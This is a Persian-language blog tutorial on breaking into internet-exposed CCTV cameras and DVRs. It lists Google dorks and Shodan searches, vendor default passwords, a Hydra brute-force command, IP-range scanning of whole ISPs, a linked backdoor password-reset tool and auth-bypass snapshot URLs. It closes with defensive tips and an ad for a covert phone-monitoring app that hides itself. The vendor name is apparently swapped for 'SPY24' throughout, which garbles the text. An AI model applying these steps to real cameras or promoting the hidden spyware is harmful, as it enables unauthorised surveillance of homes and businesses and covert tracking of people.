هک دوربین های مدار بسته و نفوذ به دوربین خطر هک شدن در دوربین

روشهای رایج که برای نفوذ به دوربین های مداربسته به کار میروند هک دوربین های مدار بسته امروزه دوربین مداربسته به یک سیستم امنیتی مهم تبدیل شده است که در اکثر مکان ها مانند مغازه ها، مراکز، دفاتر، انبار و غیره استفاده می شود.در این آموزش با روش های نفوذ به دوربین های مداربسته آشنا خواهید شد. هک دستگاه DVR/NVR

اگر بخواهیم روش های نفوذ به دوربین های مداربسته را به ترتیب بیان کنیم، یک لیست به صورت زیر خواهیم داشت:

1. دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)
2. پیدا کردن پسورد
3. دسترسی فیزیکی
4. هک وبسایت سرویس دهنده
5. هک دستگاه DVR/NVR
6. هک دستگاه DVR/NVR

دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)

در روش اول ما از طریق چند روش میتوانیم دوربین های مورد نظر خود را پیدا کنیم. به عنوان مثال : استفاده از موتور جستجوی شودانیا استفاده از گوگل و…

به منظور شروع جستجو در وب سایت شودان ابتدا به آدرس shodan.io رفته و به حساب کاربری خود در شودان لاگین کنید.

راه های زیادی به منظور جستجوی دوربین ها درون شودان وجود دارد. به عنوان نمونه جستجو بر اساس نام سازنده وبکم شروع خوبی است. به یاد داشته باشید که شودان اطلاعات بنر سازنده ها را ذخیره می کند و جستجو را بر این اساس انجام می دهد نه محتوای آنها. یکی از سازنده های معروف که نتایج خوبی را به همراه دارد، webcamxp می باشد که صدها نتیجه را به همراه خواهد داشت. به این منظور کلمه کلیدی webcamxp را درون نوار جستجو وارد کنید. همانطور که مشاهده می کنید نتایج زیادی را به همراه دارد.

تمام این وبکم ها به دلیل عدم وجود احرازهویت توسط شما قابل مشاهده هستند. و ما میتوانیم با باز کردن ایپی ادرس انها در مرورگر خود، بدون نیاز به احراز هویت دوربین ها را تماشا کنیم.

هک دوربین ها مدار بسته با شودان

همچنین میتوانیم از گوگل برای پیدا کردن این گونه دوربین ها استفاده کنیم که در این حالت نیاز به دورک های خاص داریم. به عنوان مثال من چند مورد از این دورک ها رو برای شما میزارم:

۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ ۱۸ ۱۹ ۲۰ ۲۱ ۲۲ ۲۳ ۲۴ ۲۵ ۲۶ ۲۷ ۲۸ ۲۹ ۳۰ ۳۱ ۳۲ ۳۳ ۳۴ ۳۵

inurl:”CgiStart?page=”     inurl:/view.shtml     intitle:”Live View / – AXIS     inurl:view/view.shtml     inurl:ViewerFrame?Mode=     inurl:ViewerFrame?Mode=Refresh     inurl:axis-cgi/jpg     inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)     inurl:view/indexFrame.shtml     inurl:view/index.shtml     inurl:view/view.shtml     liveapplet     intitle:”live view” intitle:axis     intitle:liveapplet     allintitle:”Network Camera NetworkCamera” (disconnected)     intitle:axis intitle:”video server”     intitle:liveapplet inurl:LvAppl     intitle:”EvoCam” inurl:”webcam.html”     intitle:”Live NetSnap Cam-Server feed”     intitle:”Live View / – AXIS”     intitle:”Live View / – AXIS 206M”     intitle:”Live View / – AXIS 206W”     intitle:”Live View / – AXIS 210?     inurl:indexFrame.shtml Axis     inurl:”MultiCameraFrame?Mode=Motion” (disconnected)     intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”     intitle:snc-z20 inurl:home/     intitle:snc-cs3 inurl:home/     intitle:snc-rz30 inurl:home/     intitle:”sony network camera snc-p1?     intitle:”sony network camera snc-m1?     site: .viewnetcam .com -www. viewnetcam .com     intitle:”Toshiba Network Camera” user login     intitle:”netcam live image” (disconnected)     intitle:”i-Catcher Console – Web Monitor”

روش پیدا کردن پسورد(Find password)

یکی از رایج ترین روش های نفوذ به دوربین های مدار بسته، روش پیدا کردن پسورد است. تمامی دوربین های مداربسته به یک دستگاه DVR/NVR که وظیفه کنترل و مدیریت دوربین ها را دارد متصل میشوند و این دستگاه نیز از طریق کابل شبکه به اینترنت متصل میشود. دستگاه DVR/NVR بعد از متصل شدن به اینترنت یک ایپی استاتیک دریافت میکند که یک هکر با داشتن آن ip و یوزرنیم و پسورد متعلق به آن، میتواند در هر جای دنیا که باشد از طریق اینترنت به دوربین ها دسترسی پیدا کند.

حال ۲ سناریو به وجود می آید:

1. روش های پیدا کردن ip دوربین ها
2. داشتن ایپی دوربین ها و نداشتن پسورد انها
3. هک دوربین های مدار بسته
4. هک دستگاه DVR/NVR

برای سناریو اول نیز میتوانیم از چند روش استفاده بکنیم که بهترین آنها استفاده از موتورهای جستجو یا اسکن رنج ایپی های متفاوت است.

در روش موتورهای جستجو، همانند روشی عمل میکنیم که در دوربین های پیکربندی نشده به ان اشاره کردیم.

در روش اسکن رنج ایپی های متفاوت نیز میتوانیم به صورت زیر عمل کنیم:

1.  نصب برنامه Angry Ip Scanner
2. انتخاب رنج ایپی مناسب
3. کانفیگ پورت برنامه انگری ایپی اسکنر به پورت های مورد استفاده در دوربین ها
4. هک دوربین های مدار بسته
5. هک دستگاه DVR/NVR

بعد از دانلود و نصب برنامه به سراغ انتخاب رنج ایپی مناسب برای دوربین های مدار بسته میرویم که من پیشنهاد میکنم از رنج ایپی خود برای این کار استفاده کنید. برای این کار کافی است تا عبارت “my ip” را در گوگل سرچ کنید.

در مرحله بعد پورت های مهم را در برنامه تنظیم میکنیم:

همچنین در قسمت Fetchers نیز گزینه web detect را مانند تصویر زیر انتخاب میکنیم:

حالا کافی است تا رنج خود را در برنامه تنظیم کرده و اسکن را شروع کنیم:

بعد از باز کردن ایپی مورد نظر در مرورگر خود به صفحه لاگین دوربین میرسیم که مهم ترین قسمت کار به شمار میرود. و سناریو دوم ما به حساب می اید:

برای پیدا کردن پسورد چندین راه وجود دارد که مهم ترین انها میتواند: شکستن پسود یا استفاده از پسورد های پیشفرض باشد.

اولین گام به منظور عبور از این سیستم ها امتحان کردن نام کاربری و رمزعبورهای پیش فرض موجود این وبکم ها می باشد . برخی از اعتبارنامه های پیش فرض این وبکم ها به شرح زیر می باشد:

۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳

ACTi : admin/123456 , Admin/123456 Axis (Old) : root/pass Grandstream: admin/admin IQinVision: root/system Mobotix: admin/meinsm Panasonic: admin/12345 Samsung Electronics: root/root , admin/4321 Samsung Techwin :admin/4321 , admin/1111111 Sony: admin/admin TRENDnet: admin/admin Toshiba: root/ikwd Vivotek : root,empty WebcamXP: admin/empty

در روش شکستن پسورد هم میتوانیم از ابزارهای موجود برای کرک کردن استفاده کنیم که یکی از این ابزارها، Hydra میباشد. این ابزار به صورت پیشفرض در سیستم عامل کالی لینوکس موجود میباشد که با استفاده از دستور زیر در محیط ترمینال میتوانیم از ان استفاده کنیم:

۱	root@kaliboys:~# hydra -s 80 -l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http

آرگومان های استفاده شده در این دستور:

• -s 80 شناسایی پورت
• -l admin یوزرنیم پیشفرض استفاده شده
• -P /root/desktop/worldlist.txt انتخاب پسورد لیست مناسب
• -e پسورد خالی
• ns تلاش برای لاگین کردن با پسورد خالی
• http پورت لازم برای اتک
• هک دوربین های مدار بسته
• هک دستگاه DVR/NVR

---

۳ روش باقیمانده دیگر نیز براساس نام انها قابل درک است و نیازی به توضیح ندارند. ولی میتوان گفت که سخت ترین روش ها میباشند. چون برای مثال یک شرکت سازنده دستگاه dvr، هیچ موقع باگی برای نفوذ باقی نمیگذارد تا با استفاده از ان نفوذگر بتواند به سیستم عبور کند. ولی امنیت هیچ موقع ۱۰۰ درصد نبوده و نخواهد بود پس احتما هک شدن سیستم با این روش نیز امکان دارد.

امیدوارم که این آموزش نیز براتون مفید بوده باشه. لطفا نظرات خودتون رو زیر پست برام کامنت کنید.

1. هک دستگاه DVR/NVR
2. هک وبسایت سرویس دهنده
3. هک دوربین های مدار بسته
4. هک دستگاه DVR/NVR

نحوه هک کردن دوربین مداربسته (راه آسان)

اگر می خواهید نحوه هک کردن دوربین مداربسته SPY24 را یاد بگیرید ، کافی است این پست وبلاگ را بخوانید. با یادگیری نحوه عملکرد این فرآیند ، می توانید از خود محافظت کنید.

اما به یاد داشته باشید که ایده این مقاله این است که در مورد لزوم بروزرسانی همیشه دوربین ها و دستگاه های متصل به اینترنت به شما هشدار دهد.

سلب مسئولیت: این مقاله با هدف کمک به مردم برای محافظت بهتر از دستگاه های متصل به اینترنت است. لطفاً دوربین مداربسته یا دستگاههای متعلق به دیگران را هک نکنید. از ابزار بهره برداری در فضای بازSPY24 می توان برای آزمایش آسیب پذیری در دوربین های تحت شبکه IP استفاده کرد ، بنابراین می توانید با به روزرسانی سیستم عامل ، آنها را اصلاح کنید. من مسئول هیچ یک از اعمال رفتار شما نسبت به این مقاله نیستم. به شما اخطار داده شده است

اکنون که به شما اخطار داده شده ، زمان آن رسیده است که در مورد ابزار بهره برداریSPY24 اطلاعاتی کسب کنید که به شما امکان می دهد دوربین تحت شبکه IP را به راحتی هک کنید.

ابزار سوء استفاده از باگ امنیتی Backdoor SPY24 چیست؟

این ابزاری است که برای بهره برداری از آسیب پذیری در دوربین های مداربسته تحت شبکه IP SPY24 ایجاد شده است.

از این ابزار می توان برای بررسی اینکه آیا دوربین تحت شبکه IP از یک سیستم عامل قدیمی استفاده می کند که به هکر اجازه می دهد تا اعتبار دستگاه (نام کاربری و رمز عبور) خود را تغییر داده و به عنوان مدیر به دوربین مداربسته دسترسی داشته باشد.

می توانید این ابزار را با نام ” تنظیم مجدد گذرواژه SPY24” پیدا کنید

لینک دانلود نرم افزار SPY24 Password کلیک کنید

رمز فایل: نفوذ به دوربین های مداربسته

spy24 دانلود هک دستگاه DVR/NVR

برای استفاده از این ابزار ، فقط باید آدرس آیپی IP و پورت مورد استفاده دوربین را بدانید. این اطلاعات اساسی و آسان برای پیدا کردن است.

پشت پرده باگ امنیتی SPY24

در سال ۲۰۱۷ یک عیب امنیتی در دوربین های تحت شبکهSPY24 کشف شد.

این در نقض فنی با ارسال دستورات مشخص به دستگاهی که به شبکه متصل است ، به عنوان یک مدیر امکان دسترسی مستقیم به دوربین را فراهم می کند.

نیازی به داشتن نام کاربری و رمز عبور برای دسترسی به دوربین ضروری نیست زیرا امکان لیست اطلاعات موجود در دستگاه و تغییر آن وجود دارد ، به این معنی که می توانید نام کاربری و رمزعبور جدیدی تنظیم کنید.

تصویر زیر نحوه بهره برداری از نقض فنی در فضای پشتی SPY24 را نشان می دهد.

این مشکل Backdoor توسط شرکت SPY24 اصلاح شد و دیگر در دوربین هایی که سیستم عامل (نرم افزار دوربین داخلی) را دارند به روز نمی شوند.

اما دوربین هایی که از نسخه قدیمی سیستم عامل استفاده می کنند در معرض خطر هستند!

نحوه استفاده از نقض فنی و هک دوربین مداربسته SPY24

کار با ابزار هک دوربین مداربسته SPY24 بسیار ساده است.

برای استفاده از آن ، فقط مراحل زیر را دنبال کنید:

۱٫ IP آیپی و پورت دوربین را تایپ کنید

۲٫ روی “دریافت لیست کاربر” کلیک کنید

۳٫ کاربر را برای تغییر رمز عبور انتخاب کنید

۴٫ رمزعبور جدید را تایپ کرده و روی دکمه کلیک کنید

نفوذ به دوربین های مداربسته :

پس از طی کردن این مراحل ، فقط کافی است آی پی IP و پورت دوربین را در مرورگر وب تایپ کرده و با استفاده از گذرواژه ای که اخیراً ایجاد کرده اید وارد شوید.

پس از استفاده از ابزار هک در فضای باز برای ایجاد تغییر رمز عبور سرپرست ، می توانید از گذرواژه و پسورد خود برای ورود به دوربین از طریق مرورگر وب استفاده کنید.

نسخه های سیستم عامل های که دارای باگ امنیتی هستند برای هک کردن SPY24

نسخه های سیستم عامل خاص وجود دارد که دارای این باگ امنیتی بکدور backdoor هستند ، به لیست مراجعه کنید: نفوذ به دوربین های مداربسته

  V5.2.0 ساخت ۱۴۰۷۲۱ 
  V5.2.0 ساخت ۱۴۱۰۱۶ 
  V5.3.0 ساخت ۱۵۰۵۱۳ 
  V5.3.6 ساخت ۱۵۱۱۰۵ 
  V5.3.8 ساخت ۱۵۱۲۲۴ 
  V5.3.5 ساخت ۱۶۱۱۱۲ 
  V5.4.0 ساخت ۱۶۰۴۰۱ 
  V5.4.0 ساخت ۱۶۰۵۲۰ 
  V5.4.1 ساخت ۱۶۰۵۲۵ 
  V5.4.0 ساخت ۱۶۰۵۳۰ 
  V5.4.3 ساخت ۱۶۰۷۰۵ 
  V5.4.3 ساخت ۱۶۰۸۰۸ 
  V5.4.4 ساخت ۱۶۱۱۲۵ 
  V5.3.9 ساخت ۱۷۰۱۰۹ 

دوربین های جدید SPY24 و دوربین هایجدید که دارای سیستم عامل جدید هستند ، این مشکل در فضای داخلی ندارند. بنابراین اطمینان حاصل کنید که دوربین های تحت شبکه IP شما بروز هستن اگر نیستن بروز کنید.

سایر مشکلات امنیتی دوربین های مداربسته SPY24

برخی از دوربین های SPY24 نیز دارای نقص امنیتی هستند که به افراد امکان می دهد فرمان را ارسال کنند و از یک عکس از دوربین بگیرند.

فقط کافیست با استفاده از آیپی IP دوربین مداربسته ، دستور زیر را در مرورگر وب تایپ کنید.

<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MTEK

همانطور که می بینید در دوربین فقط یک عکس برای شما ارسال می کند!

این دوربین همچنین می تواند تمام اطلاعات مربوط به مدل ، شماره سریال و غیره را نشان دهد

فقط کافی است دستور زیر را وارد کنید تا پاسخی از دوربین دریافت کنید

<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK

کافی است <آیپی دوربین IP> آدرس آیپی IP دوربین و <درگاه دوربین> با درگاه دوربین آیپی خود IP جایگزین کنید و دوربین اطلاعات را ارسال می کند: نفوذ به دوربین های مداربسته

<deviceName>IP CAMERA</deviceName>

<deviceID>88</deviceID>

<deviceDescription>IPCamera</deviceDescription>

<deviceLocation>hangzhou</deviceLocation>

<systemContact>SPY24</systemContact>

<model>DS-2CD2420F-IW</model>

<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>

<macAddress>a4:14:37:xx:xx:xx</macAddress>

<firmwareVersion>V5.4.5</firmwareVersion>

<firmwareReleasedDate>build 170123</firmwareReleasedDate>

<bootVersion>V1.3.4</bootVersion>

<bootReleasedDate>100316</bootReleasedDate>

<hardwareVersion>0x0</hardwareVersion>

</DeviceInfo>

همانطور که مشاهده می کنید این اطلاعات بسیار مهم است زیرا یک هکر می تواند از آسیب پذیری های بیشتری در دوربین سوءاستفاده کند.

پس از به روزرسانی دوربین مداربسته تحت شبکه IP خود ، فقط مطمئن شوید که این مشکل را ندارد ،

نحوه هک کردن دستگاهای دی وی آر DVR SPY24

دوربین های مداربسته تحت شبکه IP و دی وی آر DVR SPY24 (ضبط کننده فیلم های دیجیتال) قابل دسترس هستن و هنگام اتصال به اینترنت ، توسط هکرها نیز می توانند مورد هدف قرار بگیرند.

دی وی آر DVR های قدیمی SPY24 قبلاً دارای نام کاربری و رمزعبور پیش فرض بودند و این یک باگ بود زیرا مردم فقط باید با استفاده از رمز عبور پیش فرض معتبر admin / 12345 وارد سیستم دستگاه دی وی آر DVR میشدن.

روش بسیار ساده است ، کافیست یک دستگاه دی وی آر SPY24 را پیدا کنید که به صورت آنلاین در اینترنت باشد و این نام کاربری و رمز عبور را امتحان کنید.

و اگر افرادی که از این دستگاه DVR استفاده می کنند رمز عبور پیش فرض را تغییر نداده باشن می توانید وارد شوید.

نحوه پیدا کردن آیپی دستگاه دی وی آر SPY24 در اینترنت

خوب ، اکنون می دانید دی وی آر DVR های قدیمی (با استفاده از سیستم عامل قدیمی) به افراد اجازه می دهند رمزعبور پیش فرض را حفظ کنند ، اما سوال اینجاست که چگونه می توان آیپی و پورت یک دی وی آر SPY24 را در اینترنت پیدا کرد؟

پاسخ ساده است ، فقط باید از یک برنامه اسکنر آیپی IP استفاده کنید.

یک اسکنر آیپی IP می تواند دستگاههایی را که به اینترنت متصل هستند جستجو کند

برای دانلود نرم افزار Angry IP Scanner روی پیوند زیر کلیک کنید

برای دانلود نرم افزار angryip اینجا را کلیک کنید

برنامه اسکنر Angry IP رایگان است ، شما فقط نیاز به بارگیری ، نصب و تغییر برخی تنظیمات ساده دارید تا به نرم افزار اجازه دهید دی وی آر DVR ها را در اینترنت پیدا کند. این روند بسیار ساده است و هر کسی می تواند این کار را انجام دهد.

نرم افزار Angry IP Scanner را پیکربندی کنید نفوذ به دوربین

تصویر زیر نرم افزار Angry IP Scanner را نشان می دهد که امکان اسکن دستگاه ها در اینترنت را فراهم می کند. شما فقط باید اطلاعات صحیح را وارد کنید.

در این مثال نرم افزار دامنه رنج آیپی IP را اسکن می کند و اطلاعات را از دی وی آر SPY24 میگیرد و سپس باز می گرداند. در سمت راست صفحه مشاهده کنید که اطلاعاتی که نام ” DNVRS-webs ” و ” DVRDVS-Webs ” نشان می دهد

این اطلاعات شناسایی وب برای دی وی آر های SPY24 است ، اکنون تنها کاری که باید انجام دهید این است که دستگاه را در یک مرورگر وب باز کنید و ترکیب رمز و پسورد و یوزر admin / 12345 را امتحان کنید.

برای اطمینان از اینکه نرم افزار دی وی آر را جستجو خواهد کرد ، کافی است Tools سپس پنجره Preferences را باز کنید تا درگاه ها و پورت های 80،۲۳،۸۰۸۰،۸۰۸۱ و ۸۰۸۲ که رایج ترین آنها توسط دستگاه های دی وی آر استفاده می شود را پیدا کنید. (به تصویر زیر مراجعه کنید).

همچنین باید اطمینان حاصل کنید که ” Web Detect” در لیست موجود است.

منوی پیکربندی Tools را باز کنید و به دنبال Fetchers ها باشید

درک و نحوه کار فرآیند هک دستگاه دی وی آر SPY24

اکنون که قدم به قدم در مورد نحوه یافتن دستگاه دی وی آر در اینترنت و آزمایش ترکیبی از اعتبارنامه ها برای ورود به سیستم دارید ، مهم است که کمی بیشتر در مورد چگونگی عملکرد این فرآیند بدانید. به عکس زیر نگاهی بیندازید:

همانطور که مشاهده می کنید ، لپ تاپ در سمت چپ نرم افزار Angry IP scanner را اجرا می کند که با یک محدوده آیپی IP برای جستجو در اینترنت پیکربندی شده است.

برای مثال بیایید بگوییم که این محدوده آیپی IP از ارائه دهنده کابل اینترنت شماست ، برای افرادی که از همان شبکه استفاده می کنند مانند هاستینگ های خدمات اینترنتی شاتل صبانت Shatel ، Sabanet یا هر شبکه دیگری که به آنها متصل هستید اسکن خواهد شد.

همچنین می تواند یک محدوده رنج آیپی IP برای کل کشور باشد ، فقط باید اولین و آخرین آیپی رنج IP را در نرم افزار وارد کرده و آن محدوده را جستجو کنید.

در سمت راست تصویر روتر وجود دارد که اطلاعات مربوط به دستگاه دی وی آر DVR را برمی گرداند و نشان می دهد که آیا این یک DNVRS-webs است یا همان ” DVRDVS-Webs ” همانطور که قبلاً دیدید.

این نرم افزار دستگاه های مختلف متصل به اینترنت را جستجو می کند.

آیا در پشتی عمدا ایجاد شده جهت ورود به محصولات SPY24 ؟

بحثی پیرامون این موضوع وجود دارد ، برخی افراد بر این باورند که درپشتی برای دسترسی به دوربین ها عمداً ایجاد شده است ، اما شرکت SPY24 اظهار دارد که این تنها یک کد آزمایشی بود که در دوربین بود و به طور تصادفی توسط برنامه نویسان فراموش شده بود.

شرکت SPY24 چگونه این مشکلات را برطرف می کند؟

شرکت SPY24 یک تولید کننده بزرگ دوربین های امنیتی است که در چین واقع شده و مسئولیت رسیدگی به این نوع مشکلات را دارد.

از زمان گزارش مشکلات امنیتی ، این شرکت با تهیه یک سیستم عامل جدید برای دوربین ها ، اقدام به حل مشکل کرد.

واقعیت این است که این شرکت مشکلی در برخی از مدل های دوربین با سیستم عامل خاص موجود بود ، دارای یک پشتیبان می باشد.

آیا دوربین های SPY24 ایمن هستند؟

دستگاهی وجود ندارد که به یک شبکه متصل باشد و می توان آن را ۱۰۰٪ ایمن در نظر گرفت. مهم نیست که مارک دستگاه چی باش ، این خطر همیشه وجود دارد.

از نظر تاریخی ، SPY24 نقص های امنیتی بیشتری را در مقایسه با دیگر سازنده دوربین ارائه داده است ، اما همیشه یک بروزرسانی سیستم عامل برای رفع مشکل وجود دارد.

بنابراین ، اگر دستگاه SPY24 دارید ، آن را به روز کنید و اقدامات کمتری را برای محافظت از شبکه خود در برابر هکرها انجام دهید تا خطرات به حداقل برسد.

نتیجه هک دستگاه DVR/NVR

SPY24 یک سازنده مشهور دوربین مداربسته در جهان است که دوربین های مختلفی در سرتاسر جهان هزاران نفر به فروش برساند و همین امر باعث می شود این شرکت به هدف هکرها تبدیل شود.

بسیاری از دوربین های چینی بدون مارک دیگر نیز وجود دارند که دارای نقص امنیتی هستند اما به دلیل اینکه آنها شرکت های کوچکی هستند ، مدارکی در دست نیست و به دستگاه های خود توجه نمی کنند.

حتما دوربین های خود را تست کنید تا ببینید که آیا نقص امنیتی دارند. یا خیر

هک دوربین مداربسته (آموزش کامل)

چگونه از هک شدن دوربین مدار بسته جلوگیری کنیم ؟

استفاده از دوربین مدار بسته هر روز در حال افزایش است، به همان اندازه امکان هک شدن تصویر دوربین های نصب شده می تواند به عنوان یک خطر بالقوه افزایش یابد

از این رو در این قسمت از مجله امنیتی ایران سکوریتی می خواهیم شما دنبال کنندگان گرامی را با راههای مقابله با هک دوربین مدار بسته آشنا کنیم. با ما همراه باشید.

اخیرا هک دوربین IP یک امر بسیار شایع شده است، البته تولید کنندگان صنعت مدار بسته نیز با رعایت اصول امنیت سایبری به افزایش میزان امنیت تصویر دوربین ها کمک می کنند اما از آنجایی که امنیت یک جاده دو طرفه است ، اهمیت نقش کاربر دوربین مدار بسته نیز در این سناریو بسیار تعیین کننده است. می توان گفت که شروع اقدامات امنیتی با خرید دوربین مدار بسته آغاز می شود. میزان امنیت سایبری هر برند دوربین با برند دیگر متفاوت است از این رو پیش از خرید سیستم مدار بسته مناسب حتما با یک کارشناس و مشاور دوربین مدار بسته که به امر امنیت سایبری مسلط باشد مشورت کنید. و بررسی کنید که آیا سطح امنیتی برند انتخاب شده مناسب کسب و کار شما است یا خیر ؟

اصولا یکی از ویژگی های مشاور خوب، راهنمایی کاربران در زمینه انتخاب برند مناسب می باشد، یکی از ویژگی های برند مناسب کسب و کار شما ، رعایت اصول امنیت سایبری و مقابله در برابر هک تصویر دوربین مدار بسته می باشد. انتخاب یک مشاور آگاه و مستقل ، مشاوری که هیچ وابستگی به برند خاصی نداشته باشد می تواند شما را به هدفتان برساند.

اما چه راهکار های وجود دارد که به ما کمک می کند تا امکان هک شدن تصاویر دوربین مدار بسته را به حداقل برسانیم.

۱– پسورد دوربین مدار بسته هک دستگاه DVR/NVR

متاسفانه بسیاری از دوربین های  آی پی  (IP)نصب شده در سرتاسر دنیا با پسورد پیش فرض خود راه اندازی شده اند ، هکر ها می توانند به سادگی و با یک جستجوی ساده در اینترنت ، رمز و کلمه عبور دوربین را در اختیار داشته باشند . انتخاب یک کلمه عبور قوی و ترکیبی می تواند به میزان زیادی امکان هک و دزدیده شدن تصاویر دوربین را برای شما به ارمغان بیاورد. پیشنهاد انتخاب یک رمز عبور ۱۲ تا ۲۴ رقمی با استفاده از حروف ترکیبی بزرگ و کوچک ، اعداد و علائم مختلف می باشد.

البته برخی از برند های قدرتمند و پر فروش بازار برای حل این مشکل راه حل های مختلفی ارائه کرده اند ، از جمله می توان به راهکار شرکت هایک ویژن اشاره کرد، این شرکت دوربین های خود را بدون پسورد پیش فرض ارائه می کند و کاربر در نخستین مرتبه وارد شدن به منوی دوربین باید یک پسورد جدید و قوی را بر روی دوربین تنظیم نماید.

۲– نرم افزار دوربین ( Firmware ) هک دستگاه DVR/NVR

نرم افزار یا فریم ور دوربین را باید مرتب بروز رسانی کنید، سیستم عامل دوربین ممکن است دارای مشکلات و حفره های امنیتی باشد که هکر ها از آن بتوانند برای هک تصویر دوربین امنیتی استفاده کنند، شرکت های سازنده دوربین این مشکلات را شناسایی کرده و در نسخه های جدید تر فریم ور خود این ایرادات را برطرف می کنند از این رو استفاده از آخرین نسخه نرم افزار دوربین می تواند خطر هک شدن تصویر دوربین را به اندازه زیادی کاهش دهد.

۳– تغییر پورت های پیش فرض دوربین هک دستگاه DVR/NVR

شما می توانید پورت های مورد نیاز خود را تغییر داده و از حالت پیش فرض خارج نمایید، و سایر پورت های بدون استفاده را ببندید در این صورت امکان هک شدن تصویر دوربین به میزان قابل توجهی کاهش می یابد. به عنوان مثال شما می توانید پورت https را از حالت پیش فرض خود تغییر دهید.

نکته: اگر امکان بستن پورت های دستگاه برای شما وجود ندارد ، همواره باید ترافیک پورت ها را تحت نظر داشته باشید تا در صورت وجود ترافیک مشکوک از آن آگاه شده و امکان هک شدن تصاویر را بررسی نمایید.

۴– دوربین بی سیم (  Wireless Camera ) نفوذ به دوربین های مداربسته

برخی از دوربین های مدار بسته بصورتWireless  بی سیم نصب می شوند، در دوربین بی سیم تصاویر باید با استفاده از پروتکل WPA2-encrypted  یا WPA2-enterprise منتقل شوند در این صورت امکان هک شدن تصاویر به میزان قابل توجهی کاهش می یابد.

۵– موقعیت دوربین و نرم افزار نفوذ به دوربین

محل نصب دوربین باید به گونه ای انتخاب شود که امکان دسترسی افراد سودجو به سخت افزار دوربین به حداقل برسد، به علاوه نرم افزار و شبکه دوربین مدار بسته باید به گونه ای طراحی شود تا امکان مشاهده تصویر دوربین ها برای کاربران مختلف دیگر در دسترس نباشد ، به عنوان مثال در یک اداره نرم افزار و شبکه دوربین باید به گونه ای طراحی شود که کارمندان اداره قادر به مشاهده تصاویر دوربین در کامپیوتر خود نباشند. محدوده IP دوربین ها باید با محدوده IP شبکه و اتوماسیون اداره فرق داشته باشد.

• هک دستگاه DVR/NVR
• نفوذ به دوربین

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

• نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
• گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
• موقعیت لحظه مستمر و مسیر های پیموده شده
• وب سایت های بازدید شده و برنامه های اجرا شده
• با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
• امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور